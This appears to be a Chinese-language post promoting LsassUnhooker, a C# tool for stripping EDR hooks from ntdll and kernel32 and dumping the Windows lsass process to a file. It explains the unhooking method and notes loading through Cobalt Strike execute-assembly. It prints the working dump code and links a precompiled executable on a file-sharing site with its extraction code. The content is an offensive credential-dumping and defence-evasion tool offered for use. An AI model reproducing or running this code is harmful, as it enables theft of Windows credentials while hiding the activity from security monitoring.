LsassUnhooker - 一款可用于绕过EDR挂钩转储lsass进程的工具

LsassUnhooker

用C#编写的小程序可以绕过EDR钩子并转储lsass进程的内容，框架：.NET Framework 4，可以用CobaltStrike execute-assembly加载内存执行，集成至CS插件。

LsassUnhooker项目地址：

https://github.com/roberreigada/LsassUnhooker

SharpUnhooker项目地址：

https://github.com/GetRektBoy724/SharpUnhooker

该代码使用SharpUnhooker项目，由@GetRektBoy724创建，工作方式如下：

1. 它使用“PE parser stuff”读取并复制.text section原始（磁盘中）DLL
2. 它使用和从D/Invoke修补.text section加载的DLL（以更改内存的权限）Marshal.Copy、NtProtectVirtualMemory
3. 它通过再次读取来检查修补的内存中 DLL，并将其与原始 DLL 进行比较，以查看其是否正确修补。

通过使用SharpUnhooker和MiniDumpWriteDump函数，我能够绕过多个EDR并设法在不被发现的情况下转储lsass的内容，这是解决问题的代码：

SilentUnhooker("ntdll.dll");SilentUnhooker("kernel32.dll");String dumpFileName = Directory.GetCurrentDirectory() + "\\" + "lsass.dmp";if (System.IO.File.Exists(dumpFileName)){  System.IO.File.Delete(dumpFileName);}IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;var proc = Process.GetProcessesByName("lsass").FirstOrDefault();var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);if (result == true) {  Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\\" + "lsass.dmp");}else {  Console.WriteLine("Error dumping lsass process");}

已经编译好的LsassUnhooker.exe文件：

链接：https://pan.baidu.com/s/1VaqGK-FnyvsveN3hrz5XwA

提取码：z78j